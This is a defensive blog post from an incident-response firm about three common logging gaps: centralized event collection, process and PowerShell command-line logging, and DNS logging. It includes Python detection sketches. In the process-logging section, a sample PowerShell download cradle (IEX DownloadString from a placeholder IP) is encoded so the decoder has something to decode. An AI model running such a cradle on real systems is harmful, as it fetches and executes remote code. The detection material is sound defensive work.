The Top 3 Logging Gaps We See During Incident Response

Mar 24

In DFIR investigations at Venator Cyber Operations Group, a few logging gaps repeatedly slow our investigators down or prevent them from answering key questions (initial access, lateral movement, data access, data exfiltration, etc.). Based on what we see most often in small and medium business environments, these are the top 3 logging gaps.

1. No Centralized Windows Event Log Collection

One of the last things an attacker does is clear or overwrite the logs on the devices they operated on. This happens on network devices like switches and routers, but especially on endpoints. Without centralized collection you lose lateral movement visibility, and the investigation has to rely mostly on network-based telemetry or deeper endpoint forensics that might not paint a clear picture beyond “this malicious file existed at this time” or “the user navigated to this folder, but we can’t be certain this file was exfiltrated.”

Furthermore, many organizations that do centralize logs keep them for less than 7 days, while incident response often starts weeks later. By the time suspicious activity is detected, reported, and escalated to responders, the initial evidence may already be gone. This gap between log retention and investigation start time can severely hinder forensic analysis. In many real-world incidents, attackers maintain access to a network for weeks or months before detection. This period, often referred to as dwell time, allows adversaries to move laterally, escalate privileges, and establish persistence before anyone notices. For this reason, most DFIR and security operations best practices recommend significantly longer log retention periods. A common baseline is a minimum of 30 days for hot, searchable logs; 90–180 days in centralized storage for security investigations; and 1 year or longer for compliance, threat hunting, and legal needs.
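To make the retention gap concrete, here is a minimal Python sketch of the arithmetic. The dates are hypothetical and the function names are ours, not taken from any tool. It estimates how many days of attacker activity have already aged out of the logs by the time responders start.

```python
from datetime import date, timedelta


def oldest_available_log(investigation_start: date, retention_days: int) -> date:
    """Earliest date still covered by logs on the day responders begin."""
    return investigation_start - timedelta(days=retention_days)


def evidence_gap_days(initial_access: date, investigation_start: date,
                      retention_days: int) -> int:
    """Days of attacker activity that have already aged out of retention."""
    oldest = oldest_available_log(investigation_start, retention_days)
    return max(0, (oldest - initial_access).days)


# Hypothetical incident: initial access on 1 March, responders engaged 42 days later.
initial_access = date(2024, 3, 1)
investigation_start = date(2024, 4, 12)

for retention in (7, 30, 90):
    gap = evidence_gap_days(initial_access, investigation_start, retention)
    print(f"{retention:>3}-day retention: {gap} days of activity unrecoverable")
```

In this scenario, 7-day retention loses the first 35 days of the intrusion, including initial access, while 90-day retention covers the whole period.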

Host, network, and cloud logs, including logs from networking devices, can be forwarded to a central logging platform such as a SIEM or log aggregation system like Splunk, Elastic Stack, or Microsoft Sentinel. A relatively inexpensive way for organizations to gain visibility into network communications, especially when they lack full packet capture or advanced network detection tools, is to enable NetFlow or similar flow-based telemetry on routers and switches and forward that data to a centralized collector. Flow logging provides a summary of network conversations, allowing analysts to understand how systems communicate across the network without capturing the full contents of every packet.

Similarly, network security monitoring tools can extract useful metadata from network traffic without requiring full packet capture. One common example is Zeek, which analyzes traffic and generates structured logs describing connections and protocol activity. Traffic can be delivered to monitoring tools in several ways; two of the most common are Switch Port Analyzer (SPAN) ports and network taps. Both approaches allow tools such as Zeek or Suricata to observe network traffic without directly interfering with the normal flow of data across the network.
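As a rough illustration of what the flow telemetry described above can answer, the Python sketch below looks for internal hosts that reach several other internal hosts on remote-administration ports, a pattern worth reviewing for lateral movement. The record layout, the internal address range, and the port list are all assumptions for this example; real collector exports will use different field names.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Assumptions: internal address space and ports treated as remote administration.
INTERNAL_NET = ip_network("10.0.0.0/8")
ADMIN_PORTS = {22: "SSH", 135: "RPC", 445: "SMB", 3389: "RDP", 5985: "WinRM"}

# Hypothetical flow records, already parsed from a collector export.
flows = [
    {"src": "10.0.5.23", "dst": "10.0.1.10", "dst_port": 445, "bytes": 18_400},
    {"src": "10.0.5.23", "dst": "10.0.1.11", "dst_port": 445, "bytes": 17_950},
    {"src": "10.0.5.23", "dst": "10.0.1.12", "dst_port": 3389, "bytes": 904_112},
    {"src": "10.0.5.40", "dst": "203.0.113.7", "dst_port": 443, "bytes": 52_000},
    {"src": "10.0.5.41", "dst": "10.0.1.10", "dst_port": 445, "bytes": 3_200},
]


def internal_admin_fanout(records):
    """Map each internal source to the internal hosts it reached on admin ports."""
    fanout = defaultdict(set)
    for rec in records:
        src, dst = ip_address(rec["src"]), ip_address(rec["dst"])
        if src in INTERNAL_NET and dst in INTERNAL_NET and rec["dst_port"] in ADMIN_PORTS:
            fanout[rec["src"]].add((rec["dst"], ADMIN_PORTS[rec["dst_port"]]))
    return fanout


fanout = internal_admin_fanout(flows)
# Hosts touching the most internal targets are listed first.
for src, targets in sorted(fanout.items(), key=lambda kv: len(kv[1]), reverse=True):
    print(src, "->", sorted(targets))
```

Flow data cannot show what was done over those connections, but it can tell an investigator which hosts to examine next.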

2. No Process Creation Logging and Context

Many business environments don’t enable enhanced process logging, which significantly reduces visibility during incident response. Windows can log process creation events, but it does not do so unless auditing is enabled. Furthermore, without additional configuration, investigators only see limited information such as the process name and basic metadata.

For example, after process creation auditing is enabled, the Windows Security Event Log records a process creation event (Event ID 4688), but unless command line logging is also enabled, it only shows the executable that ran (e.g., powershell.exe or cmd.exe). This creates a major blind spot because many legitimate administrative tools are frequently abused by attackers. Simply knowing that powershell.exe executed is rarely useful by itself, since administrators and automated tools run PowerShell constantly in normal environments. The critical information investigators need is the command line arguments used to launch the process, because they reveal what the process actually did. Beyond command line logging, PowerShell Script Block Logging is incredibly powerful because it records the PowerShell code that actually executed, even when the original script was obfuscated, a technique threat actors commonly use to bypass basic antivirus.
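The Python sketch below illustrates why the command line matters. Both hypothetical 4688 events name the same executable, and only the command line separates a routine backup script from an encoded download cradle. The event dictionaries, the sample command, and the regular expression (which covers only common short forms of -EncodedCommand) are assumptions for this example. The decoding step relies on the fact that PowerShell expects the encoded command as Base64 over UTF-16LE text.

```python
import base64
import re

# Matches -EncodedCommand and common short forms such as -e, -ec, and -enc.
ENCODED_ARG = re.compile(r"\s[-/]e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def decode_encoded_command(command_line):
    """Return the decoded PowerShell command, or None if none is present."""
    match = ENCODED_ARG.search(command_line)
    if not match:
        return None
    try:
        # PowerShell encodes the command as Base64 over UTF-16LE text.
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers invalid Base64 and invalid UTF-16 data
        return None


# Hypothetical attacker command, encoded here so the sample event is self-consistent.
hidden = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
encoded = base64.b64encode(hidden.encode("utf-16-le")).decode("ascii")

POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
events = [
    {"EventID": 4688, "NewProcessName": POWERSHELL,
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"EventID": 4688, "NewProcessName": POWERSHELL,
     "CommandLine": f"powershell.exe -NoP -W Hidden -enc {encoded}"},
]

for event in events:
    decoded = decode_encoded_command(event["CommandLine"])
    print(event["NewProcessName"], "|", decoded or "no encoded command")
```

Without the CommandLine field, these two events would be indistinguishable.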

In most enterprise environments these settings are configured centrally through Group Policy. On standalone (non-domain-joined) computers, they can be enabled in the Windows Registry: command line auditing under HKLM\Software\Microsoft\Windows, and PowerShell logging under HKLM\Software\Policies\Microsoft\Windows.
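For a standalone host, the following Python sketch prints the commands that, to the best of our knowledge, correspond to the process creation, command line, and Script Block Logging settings discussed above. The registry value names are the ones we understand the Group Policy settings to write; treat them as assumptions and verify them against Microsoft's documentation before deploying. The script only generates the commands and does not change the system.

```python
# Assumption: a standalone Windows host where Group Policy is not available.
# Turns on success auditing for process creation (Event ID 4688).
AUDIT_POLICY_COMMAND = 'auditpol /set /subcategory:"Process Creation" /success:enable'

# Registry values believed to back the two policy settings; verify before use.
REGISTRY_SETTINGS = [
    {
        "purpose": "Include the command line in Event ID 4688",
        "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit",
        "value": "ProcessCreationIncludeCmdLine_Enabled",
    },
    {
        "purpose": "PowerShell Script Block Logging (Event ID 4104)",
        "key": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging",
        "value": "EnableScriptBlockLogging",
    },
]


def reg_add_command(key, value_name, data=1):
    """Render a reg.exe command that sets a DWORD value."""
    return f'reg add "{key}" /v {value_name} /t REG_DWORD /d {data} /f'


def build_commands():
    """Return the audit policy command followed by one reg.exe command per setting."""
    commands = [AUDIT_POLICY_COMMAND]
    commands += [reg_add_command(s["key"], s["value"]) for s in REGISTRY_SETTINGS]
    return commands


for command in build_commands():
    print(command)
```

The printed commands would need to be run from an elevated prompt. In a domain, the equivalent Group Policy settings remain the better option because they are applied and enforced centrally.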

3. Missing DNS Logging

Many organizations focus heavily on firewall logging, capturing information such as source IP, destination IP, ports, and allowed or blocked connections. While this data is useful for understanding network communication patterns, it often does not provide visibility into the DNS queries that preceded those connections. As a result, analysts can see that a host communicated with an IP address, but they cannot determine which domain name the system attempted to resolve before making that connection.

One major use of DNS by attackers is command-and-control (C2) communication. Malware typically contacts a domain name controlled by the attacker to retrieve instructions or send status updates. Even if the actual network connection is encrypted or uses common protocols like HTTPS, the initial DNS lookup can reveal the domain associated with the attacker infrastructure. For example, malware might resolve a domain such as update-service-check[.]com before connecting to the attacker’s server. Without DNS logs, investigators may only see an outbound connection to an IP address, making it much harder to identify that the traffic was malicious.
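A minimal Python sketch of that correlation follows, assuming DNS and firewall logs have already been parsed into dictionaries. The field names and sample records are hypothetical. It annotates each firewall connection with the domain names the same host resolved to that destination IP.

```python
from collections import defaultdict

# Hypothetical DNS log. The domain is kept defanged as in the article;
# real logs contain the plain name.
dns_log = [
    {"client": "10.0.5.23", "query": "update-service-check[.]com", "answers": ["203.0.113.7"]},
    {"client": "10.0.5.23", "query": "www.example.com", "answers": ["198.51.100.20"]},
]

# Hypothetical firewall log for the same host.
firewall_log = [
    {"src": "10.0.5.23", "dst": "203.0.113.7", "dst_port": 443, "action": "allow"},
    {"src": "10.0.5.23", "dst": "198.51.100.20", "dst_port": 443, "action": "allow"},
    {"src": "10.0.5.23", "dst": "192.0.2.99", "dst_port": 8443, "action": "allow"},
]


def build_resolution_index(dns_records):
    """Index queried names by (client, answer IP)."""
    index = defaultdict(set)
    for rec in dns_records:
        for ip in rec["answers"]:
            index[(rec["client"], ip)].add(rec["query"])
    return index


def annotate_connections(fw_records, index):
    """Attach the names each source resolved to the destination IP, if any."""
    annotated = []
    for rec in fw_records:
        names = sorted(index.get((rec["src"], rec["dst"]), set()))
        annotated.append({**rec, "resolved_from": names})
    return annotated


annotated = annotate_connections(firewall_log, build_resolution_index(dns_log))
for conn in annotated:
    print(conn["dst"], conn["dst_port"], conn["resolved_from"] or "no DNS lookup seen")
```

A connection with no matching lookup, like the third record here, is also worth a look, since it may indicate a hard-coded IP address or a resolver that is not being logged.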

DNS is also central to malware that uses Domain Generation Algorithms (DGAs). Some malware families dynamically generate hundreds or thousands of potential domain names each day and attempt to resolve them until one successfully connects to the attacker’s infrastructure. DNS logs can reveal this behavior because the infected host will produce a large number of failed or unusual domain lookups. For example, a system might attempt to resolve domains such as kjsdf83hj[.]com, lkdjf92sd[.]net, and asjdf83kdl[.]org in rapid succession. This pattern is a strong indicator of DGA-based malware activity, but it is only visible if DNS queries are recorded.
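One simple way to surface this pattern, sketched below in Python, is to count failed lookups per host and measure how random the failed names look using Shannon entropy. The log layout, the thresholds, and the refang helper are assumptions for illustration. Production detections typically use richer features and larger baselines.

```python
import math
from collections import Counter, defaultdict


def refang(name):
    """Undo the article's [.] defanging so the name parses like a real log entry."""
    return name.replace("[.]", ".")


def shannon_entropy(text):
    """Bits of entropy per character; random-looking labels score higher."""
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def suspected_dga_hosts(dns_records, min_failures=3, min_entropy=2.8):
    """Flag clients with many failed lookups whose first labels look random."""
    failed_labels = defaultdict(list)
    for rec in dns_records:
        if rec["rcode"] == "NXDOMAIN":
            failed_labels[rec["client"]].append(refang(rec["query"]).split(".")[0])
    flagged = {}
    for client, labels in failed_labels.items():
        average = sum(shannon_entropy(label) for label in labels) / len(labels)
        if len(labels) >= min_failures and average >= min_entropy:
            flagged[client] = round(average, 2)
    return flagged


# Hypothetical DNS log entries using the example domains from the text.
dns_log = [
    {"client": "10.0.5.23", "query": "kjsdf83hj[.]com", "rcode": "NXDOMAIN"},
    {"client": "10.0.5.23", "query": "lkdjf92sd[.]net", "rcode": "NXDOMAIN"},
    {"client": "10.0.5.23", "query": "asjdf83kdl[.]org", "rcode": "NXDOMAIN"},
    {"client": "10.0.5.40", "query": "www.example.com", "rcode": "NOERROR"},
    {"client": "10.0.5.40", "query": "wpad.example.com", "rcode": "NXDOMAIN"},
]

flagged = suspected_dga_hosts(dns_log)
print(flagged)
```

Only the host with repeated, random-looking failures is flagged. The single failed lookup from the second host does not meet the failure threshold.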

Another technique attackers use is DNS tunneling, where DNS queries and responses are abused to carry data. Because DNS traffic is almost always allowed through firewalls, attackers can encode information within DNS requests to bypass traditional network security controls. For instance, malware might send encoded data within subdomains such as datachunk1[.]attacker-domain.com, datachunk2[.]attacker-domain.com, and so on.
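A rough heuristic for spotting this in DNS logs is to count how many distinct subdomains are requested under each parent domain, as in the Python sketch below. The threshold, the sample queries, and the two-label parent domain shortcut are assumptions. Real tunneling often uses long encoded labels as well, so label length would be a useful extra signal.

```python
from collections import defaultdict


def refang(name):
    """Undo the article's [.] defanging so the name parses like a real log entry."""
    return name.replace("[.]", ".")


def tunneling_candidates(queries, min_unique_subdomains=3):
    """Return parent domains that received many distinct subdomain queries."""
    subdomains = defaultdict(set)
    for query in queries:
        labels = refang(query).lower().rstrip(".").split(".")
        if len(labels) > 2:
            # Naive assumption: the last two labels form the registrable domain.
            parent = ".".join(labels[-2:])
            subdomains[parent].add(".".join(labels[:-2]))
    return {
        parent: len(subs)
        for parent, subs in subdomains.items()
        if len(subs) >= min_unique_subdomains
    }


# Hypothetical queries from one host, using the naming pattern from the text.
queries = [
    "datachunk1[.]attacker-domain.com",
    "datachunk2[.]attacker-domain.com",
    "datachunk3[.]attacker-domain.com",
    "datachunk4[.]attacker-domain.com",
    "www.example.com",
    "mail.example.com",
]

candidates = tunneling_candidates(queries)
print(candidates)
```

Legitimate services such as content delivery networks can also generate many unique subdomains, so results like these are leads for review rather than verdicts.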

When DNS logging is not enabled, investigators lose the ability to answer some of the most important questions during an incident response investigation. For example, they may not be able to determine what domains a compromised host attempted to resolve, which domains were associated with attacker infrastructure, or whether a system was repeatedly attempting to contact suspicious domains over time.

If the organization uses Active Directory–integrated DNS, the internal DNS servers can log queries. Many organizations already use security platforms that log DNS queries, such as those from Palo Alto Networks, Cisco Systems, and Fortinet. However, if you rely only on these edge devices and most systems use segmented internal DNS resolvers, this will be less effective, and a multi-pronged approach may be required to collect queries to both internal and external resolvers. On individual endpoints, DNS activity can also be logged directly with Sysmon (Event ID 22), which ties each query to the process name, process ID, and user context.

Conclusion

In DFIR engagements, the difference between a clear, defensible timeline and an incomplete or inconclusive investigation often comes down to logging. Across small and medium business environments, the same gaps continue to surface: lack of centralized log collection, insufficient process visibility, and missing DNS telemetry. Individually, each of these gaps introduces blind spots. Together, they significantly limit an investigator’s ability to determine how an attacker gained access, what actions were taken, and whether data was accessed or exfiltrated.

Without centralized logging, critical evidence is often lost before an investigation even begins. Without detailed process creation and command-line visibility, attacker activity blends in with legitimate administrative behavior. Without DNS logging, investigators lose one of the most reliable indicators of malicious infrastructure and command-and-control activity. These are not edge cases—they are the most common points of failure we encounter in real-world investigations.

Addressing these gaps does not require overly complex or expensive solutions. Establishing centralized log aggregation with appropriate retention, enabling enhanced process and PowerShell logging, and capturing DNS queries across both internal and external resolvers provide immediate and measurable improvements in visibility. These controls allow organizations to move from reactive guesswork to evidence-driven investigations.

At Venator Cyber Operations Group, we consistently see that organizations with these foundational logging capabilities in place are able to respond faster, answer critical questions with confidence, and reduce overall impact during an incident. Logging is not just a compliance requirement—it is the backbone of effective incident response.

Sam Rothlisberger
